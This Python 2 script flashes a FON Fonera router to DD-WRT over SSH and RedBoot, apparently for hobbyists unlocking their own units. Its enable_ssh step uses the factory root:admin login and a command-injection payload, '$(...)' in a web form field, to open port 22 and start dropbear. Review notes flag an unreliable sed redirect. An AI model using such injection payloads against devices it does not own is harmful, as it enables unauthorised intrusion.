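#!/usr/bin/env python
#
# Fonera DD-WRT Autoflash
# 03-29-2007
# By: Coldsteal
# http://i-trash.org
# Pexpect - http://pexpect.sourceforge.net
#
# Python 2 script (raw_input, SimpleHTTPServer). Flashes a FON Fonera running
# the stock 0.7.1 r1 firmware to DD-WRT from a Linux host on the Fonera's
# Ethernet port. Steps, in order:
#   1. move the host NIC to 169.254.255.2/24 and download the four images;
#   2. serve the working directory over HTTP on port 8000 for the Fonera;
#   3. enable SSH on the stock firmware through its web interface;
#   4. over SSH, make dropbear persistent and flash the CAMICIA kernel;
#   5. after the reboot, over SSH, write the RedBoot config (out.hex);
#   6. move the host NIC to 192.168.1.166/24 and, through RedBoot on
#      telnet port 9000, load root.fs / vmlinux.bin.l7 over TFTP and
#      create the flash partitions.
#
# Needs root for ifconfig. While the helper web server runs, everything in
# the working directory is readable from the link-local network.
# NOTE(review): RedBoot's `load` fetches from the TFTP host given to
# `ip_address -h`; nothing here starts a TFTP server, so one must already be
# serving root.fs and vmlinux.bin.l7 from the working directory -- confirm.

import os
import re
import signal
import socket
import subprocess
import sys
import time

import pexpect

FONERA_IP = '169.254.255.1'     # stock firmware address
HOST_IP = '169.254.255.2'       # host address during the SSH phases
REDBOOT_IP = '192.168.1.254'    # RedBoot address during the telnet phase
HOST_IP_2 = '192.168.1.166'     # host address during the telnet phase
WEB_PORT = 8000                 # SimpleHTTPServer.test() default
REBOOT_WAIT = 240               # seconds to give the Fonera to come back
# pexpect's default expect() timeout is 30 s; flash writes and TFTP loads
# may take longer, so sessions get a larger default.  Adjust if needed.
SESSION_TIMEOUT = 300

# Download locations as published with the original script.
ROOTFS_URL = "http://www.dd-wrt.com/dd-wrtv2/down.php?path=downloads/beta releases/fonera builds/2007 - 0323/&download=root.fs"
VMLINUX_URL = "http://www.dd-wrt.com/dd-wrtv2/down.php?path=downloads/beta releases/fonera builds/2007 - 0323/&download=vmlinux.bin.l7"
OPENWRT_VMLINUX_URL = "http://fonera.info/camicia/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma"
OUT_HEX_URL = "http://fonera.info/camicia/out.hex"

SSH_NEWKEY = 'Are you sure you want to continue connecting'
OPENWRT_PROMPTS = ['root@OpenWrt:~#', 'root@OpenWrt:~# ']
REDBOOT_PROMPTS = ['RedBoot>', 'RedBoot> ']

# The interface name is spliced into ifconfig arguments; accept plain names only.
IFACE_RE = re.compile(r'^[A-Za-z0-9_.:-]+$')


def run(argv):
    """Run *argv* without a shell and return its exit status.

    A non-zero status is printed but not fatal: the original script ignored
    the results of these commands and the flow is best-effort.
    """
    status = subprocess.call(argv)
    if status != 0:
        print("warning: %s exited with status %d" % (argv[0], status))
    return status


def set_host_ip(iface, address, broadcast):
    """Bring *iface* down and back up on *address*, netmask 255.255.255.0."""
    run(['ifconfig', iface, 'down'])
    run(['ifconfig', iface, address, 'netmask', '255.255.255.0',
         'broadcast', broadcast, 'up'])
    time.sleep(1)


def download_images():
    """Fetch the four images into the working directory with wget.

    The dd-wrt URLs contain spaces and an '&'.  Passing each URL as one argv
    element keeps it intact; an unquoted shell command line would split it
    on the spaces and treat '&' as a background operator.
    """
    run(['wget', '--output-document=root.fs', ROOTFS_URL])
    run(['wget', '--output-document=vmlinux.bin.l7', VMLINUX_URL])
    run(['wget', OPENWRT_VMLINUX_URL])
    run(['wget', OUT_HEX_URL])
    time.sleep(1)


def start_web_server():
    """Serve the working directory on port 8000 from a background interpreter.

    Returns the Popen handle so the server can be stopped on every exit path.
    sys.executable is used because SimpleHTTPServer is a Python 2 module and
    this script is itself running under Python 2.
    """
    server = subprocess.Popen(
        [sys.executable, '-c', 'import SimpleHTTPServer;SimpleHTTPServer.test()'])
    time.sleep(1)
    return server


def stop_web_server(server):
    """Stop the helper web server.

    Signals the interpreter started by start_web_server(), then runs the
    original kill_webserver.sh helper (not part of this file) for
    compatibility with existing setups.
    """
    try:
        os.kill(server.pid, signal.SIGTERM)
    except OSError:
        pass  # the server process has already exited
    os.system("sh kill_webserver.sh &")


def enable_ssh():
    """Open port 22 and start dropbear on the stock 0.7.1 r1 firmware.

    Goes through the stock web interface using its factory credentials; a
    unit whose password or firmware has been changed will not respond to it.
    The command strings are constants, so running them through the shell is
    not an injection concern.
    """
    print("0.7.1 r1 enable ssh")
    os.system("curl --user root:admin -d username='$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)' http://169.254.255.1/cgi-bin/webif/connection.sh")
    time.sleep(1)
    os.system("curl --user root:admin -d username='$(/etc/init.d/dropbear)' http://169.254.255.1/cgi-bin/webif/connection.sh")
    time.sleep(1)


def ssh_login(host, password, timeout=SESSION_TIMEOUT):
    """Open an ssh session as root to *host* and return the pexpect child.

    An unknown host key is accepted, as in the original script.  Returns
    None (after printing what ssh said) if no password prompt appears.
    NOTE(review): a stale entry for *host* in ~/.ssh/known_hosts makes ssh
    refuse the connection, which shows up here as a timeout -- remove it first.
    """
    child = pexpect.spawn('ssh root@%s' % host, timeout=timeout)
    i = child.expect([pexpect.TIMEOUT, SSH_NEWKEY, 'password: '])
    if i == 1:
        # Accept the key, then wait for the single password prompt that
        # follows.  Expecting 'password: ' twice here (as the original did)
        # consumed the prompt once and always timed out on the second wait.
        child.sendline('yes')
        i = child.expect([pexpect.TIMEOUT, 'password: '])
    if i == 0:
        print('ERROR!')
        print('SSH could not login. Here is what SSH said:')
        print('%s %s' % (child.before, child.after))
        return None
    child.sendline(password)
    return child


def run_shell_commands(child, prompts, commands):
    """Send each command to an interactive shell, waiting for a prompt after it.

    sendline() already appends the newline, so commands must not end in
    '\\n': a second newline yields an extra prompt and leaves every later
    expect() one prompt behind the command it is meant to wait for.  After
    the initial sync newline any prompts already buffered are drained so the
    first command's expect() waits for that command and not for leftovers.
    """
    child.sendline('')
    child.expect(prompts)
    timeout_index = len(prompts)
    while child.expect(prompts + [pexpect.TIMEOUT], timeout=2) != timeout_index:
        pass
    for command in commands:
        child.sendline(command)
        child.expect(prompts)


def send_reboot(child, command):
    """Issue a reboot/reset *command* plus a trailing newline, without waiting."""
    child.sendline(command)
    child.sendline('')
    time.sleep(1)


def main():
    """Run the whole flash procedure; exits non-zero on an SSH login failure."""
    if hasattr(os, 'geteuid') and os.geteuid() != 0:
        print("warning: not running as root; ifconfig will probably fail")
    iface = raw_input("Ethernet card (eg eth0): ")
    if not IFACE_RE.match(iface):
        print("'%s' does not look like an interface name" % iface)
        sys.exit(1)

    print("Change IP to 169.254.255.2, subnet 255.255.255.0\n\n")
    set_host_ip(iface, HOST_IP, '169.254.255.255')

    download_images()
    server = start_web_server()
    try:
        enable_ssh()

        print("SSH Part 1\n")
        child = ssh_login(FONERA_IP, 'admin')
        if child is None:
            sys.exit(1)
        # NOTE(review): the firewall.user line redirects sed's output onto
        # the file cat is still reading; the shell truncates it first, so
        # the result is unreliable.  Kept as published -- verify on a unit.
        run_shell_commands(child, OPENWRT_PROMPTS, [
            'mv /etc/init.d/dropbear /etc/init.d/S50dropbear',
            'cat /etc/firewall.user|sed \'s:#::\'>/etc/firewall.user',
            'cd /tmp',
            'wget http://169.254.255.2:8000/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma',
            'mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7',
        ])
        send_reboot(child, 'reboot')
        print("please wait 4 min while Fonera reboots\n")
        time.sleep(REBOOT_WAIT)

        print("SSH Part 2\n")
        child = ssh_login(FONERA_IP, 'admin')
        if child is None:
            sys.exit(1)
        # The original fetched out.hex without a port, but the only server
        # this script provides listens on 8000 (see start_web_server).
        run_shell_commands(child, OPENWRT_PROMPTS, [
            'cd /tmp',
            'wget http://169.254.255.2:8000/out.hex',
            'mtd -e "RedBoot config" write out.hex "RedBoot config"',
        ])
        send_reboot(child, 'reboot')
        print("please wait 4 min while Fonera reboots\n")
        time.sleep(REBOOT_WAIT)

        print("Change IP to 192.168.1.166, subnet 255.255.255.0")
        set_host_ip(iface, HOST_IP_2, '192.168.1.255')

        # RedBoot: partition the flash and load the DD-WRT images over TFTP.
        redboot = pexpect.spawn('telnet %s 9000' % REDBOOT_IP,
                                timeout=SESSION_TIMEOUT)
        run_shell_commands(redboot, REDBOOT_PROMPTS, [
            'ip_address -l 192.168.1.254/24 -h 192.168.1.166',
            'fis init',
            'load -r -v -b 0x80041000 root.fs',
            'fis create -b 0x80041000 -f 0xA8030000 -l 0x002C0000 -e 0x00000000 rootfs',
            'load -r -v -b 0x80041000 vmlinux.bin.l7',
            'fis create -r 0x80041000 -e 0x80041000 -l 0x000E0000 vmlinux.bin.l7',
            'fis create -f 0xA83D0000 -l 0x00010000 -n nvram',
        ])
        send_reboot(redboot, 'reset')
        print("please wait 4 min while Fonera resets\n")
        time.sleep(REBOOT_WAIT)
        print("Now pull the plug on the Fonera and restart it. Once it is restarted go to http://192.168.1.1 via wireless\n")
        time.sleep(1)
    finally:
        # Runs on success and on sys.exit() from a failed login, so the web
        # server is not left serving the working directory.
        print("call bash script to kill webserver and exit\n")
        stop_web_server(server)
    sys.exit(0)


if __name__ == "__main__":
    main()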